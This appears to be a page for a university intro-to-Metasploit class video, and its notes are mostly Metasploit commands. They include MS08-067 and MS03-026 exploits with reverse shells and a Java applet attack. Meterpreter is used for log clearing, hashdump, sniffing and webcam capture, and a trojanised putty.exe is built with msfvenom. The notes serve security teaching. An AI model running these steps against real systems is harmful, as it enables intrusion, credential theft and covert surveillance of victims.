Intro to Metasploit Class at IU Southeast (Hacking Illustrated
Series InfoSec Tutorial Videos)
Intro to Metasploit Class at IU Southeast
This is a class we did to introduce students to Metasploit at IU Southeast.
Special guest lecturer Jeremy Druin (@webpwnize).
To follow along, I recommend downloading Kali Linux. Bing thanks to
http://www.offensive-security.com/
and please donate to
http://www.hackersforcharity.org/
Download:
https://archive.org/download/IntoToMetasploitClassAtIUSoutheast/Into%20to%20Metasploit%20Class%20at%20IU%20Southeast.mp4
Notes:
Metasploit Notes 1
(Based on
http://www.offensive-security.com/metasploit-unleashed)
Show directory structure
cd /opt/metasploit/apps/pro/msf3
ls
cd modules
<tab it out>
cd /opt/metasploit/apps/pro/msf3
Updates
msfupdate
apt-get update;apt-get
dist-upgrade
msfcli
msfcli exploits/windows/dcerpc/ms03_026_dcom
O
msfcli exploits/windows/dcerpc/ms03_026_dcom
P
msfcli exploits/windows/dcerpc/ms03_026_dcom
rhost=TARGET-IP lhost=METASPLOIT-IP
payload=windows/shell_reverse_tcp E
msfcli exploits/windows/dcerpc/ms03_026_dcom
rhost= TARGET-IP E
msfconsole
http://docs.kali.org/general-use/starting-metasploit-framework-in-kali
service postgresql start
service metasploit start
update-rc.d postgresql
enable
update-rc.d metasploit
enable
help
?
ping irongeek.com
search ms08
use
exploit/windows/smb/ms08_067_netapi
back
info
exploit/windows/smb/ms08_067_netapi
use
exploit/windows/smb/ms08_067_netapi
show options
set rhost
TARGET-IP
exploit
run
active vs passive
use
exploit/multi/browser/java_signed_applet
set lport 3456
set SRVPORT 3245
set lhost
METASPLOIT-IP
set APPLETNAME
"Adrians_funapp"
set CERTCN irongeek.com
set ENCODER
x86/shikata_ga_nai
set payload
windows/meterpreter/reverse_tcp
set uripath /
run
jobs
kill 0
Social Engineering
Toolkit Way
setoolkit
1 2 1 2
no
METASPLOIT-IP
irongeek.com
2 3
445
Meterpreter
ls
sysinfo
shell
exit
help
help core
background
sessions -l
session -i 1
cd
pwd
cat
clearev #Clear logs
getsystem
ps
migrate 608
getuid
hashdump
load -l
load sniffer
sniffer_interfaces
sniffer_start 1
sniffer_stats 1
sniffer_dump 1
/root/my.pcap
sniffer_stop 1
screenshot
resource somefile
run vnc
Using a Scanner
msfconsole
db_status
workspace
hosts
use
auxiliary/scanner/smb/smb_version
set rhosts
TARGET-IP/24
set threads 100
run
hosts
Trojans
/etc/init.d/apache2 start
cd /var/www
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
msfpayload windows/meterpreter/reverse_tcp
LHOST= METASPLOIT-IP LPORT=443 R | msfencode
-e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -k -o /var/www/puttyx.exe
Or
msfvenom -p windows/meterpreter/reverse_tcp
LHOST= METASPLOIT-IP LPORT=443 -x /var/www/putty.exe
-e x86/shikata_ga_nai -i 15 -k -f exe >some.exe
(in msfconsole)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST
METASPLOIT-IP
set LPORT 443
exploit
(run the exe, and show
some other things)
webcam_list
webcam_snap 1
run webcam
Armitage as Metasploit
GUI
service postgresql start
service metasploit start
armitage